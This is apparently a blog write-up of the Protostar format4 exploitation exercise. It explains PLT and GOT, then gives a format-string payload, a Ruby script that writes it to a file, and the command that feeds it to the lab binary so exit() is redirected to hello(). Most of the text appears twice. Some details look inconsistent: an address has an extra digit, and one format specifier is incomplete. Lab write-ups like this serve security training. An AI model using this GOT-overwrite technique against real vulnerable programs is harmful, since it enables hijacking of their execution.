Last level of the format section was more interesting. It supposed you to change code execution sequence. Immediately after printf is called there is a call to exit() function. But in order to reuse code in memory there is a PLT(procedure linkage table) that redirects execution to the place according the address of the specified function in GOT (Global Offset Table). Since .plt section in or binary is read-only and jump is made after address dereference we have to change a value that this address references to our value. This article contains very detailed description of PLT, GOT, PIC(Position Independent Code).
First of all let's find target address. You can get it from objdump -TR : 08049724 exit . Then we need to find that should be set with objdump -t : 804884b4 hello. So we have to change two bytes to redirect execution from exit to hello function. Also find your string on stack using gdb.
We have to set value at address 0x08049724 to b4 and 0x08049725 to 84. It can be done with such a format string:
"\x24\x97\x04\x08\x25\x97\x04\x08%172x%4$hhn%208%5$hhn",
where %Nx provides needed amount(N) of printed bytes and
%P$hhn gets Pth argument from the stack as an address and writes there one-byte value - amount of currently printed bytes.
The whole script :
Since _exit() which is present in hello function may not flush I/O buffers (According to _exit man page) then it's ok that during some ways of execution you won't see the congratulation string. That is why you have to manually call format4 with an input from file.
Screenshot:
First of all let's find target address. You can get it from objdump -TR : 08049724 exit . Then we need to find that should be set with objdump -t : 804884b4 hello. So we have to change two bytes to redirect execution from exit to hello function. Also find your string on stack using gdb.
We have to set value at address 0x08049724 to b4 and 0x08049725 to 84. It can be done with such a format string:
"\x24\x97\x04\x08\x25\x97\x04\x08%172x%4$hhn%208%5$hhn",
where %Nx provides needed amount(N) of printed bytes and
%P$hhn gets Pth argument from the stack as an address and writes there one-byte value - amount of currently printed bytes.
The whole script :
#!/usr/bin/ruby1.9.1 fmt_string = "\x24\x97\x04\x08\x25\x97\x04\x08%172x%4$hhn%208%5$hhn" File.open('format4.hex','wb') do |f| f.write fmt_string endThen from bash you have to run it:
./format4.rb
/opt/protostar/bin/format4 < format4.hex
Since _exit() which is present in hello function may not flush I/O buffers (According to _exit man page) then it's ok that during some ways of execution you won't see the congratulation string. That is why you have to manually call format4 with an input from file.
Screenshot:
No comments:
Post a Comment